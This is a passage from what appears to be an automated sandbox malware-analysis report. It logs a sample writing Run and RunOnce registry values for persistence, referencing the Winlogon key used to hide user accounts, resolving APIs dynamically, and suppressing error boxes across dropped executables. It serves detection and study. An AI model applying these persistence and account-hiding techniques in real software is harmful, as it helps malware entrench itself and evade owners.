                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysUpdateSvc
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BackgroundUpdater

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Contains functionality to hide user accounts
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F0782 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005F0782
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\f3b3de9e353268524740ab3df9b4ee37 6D8D71DC0AF72849B01CAF815019C473Jump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeProcess information set: NOOPENFILEERRORBOX
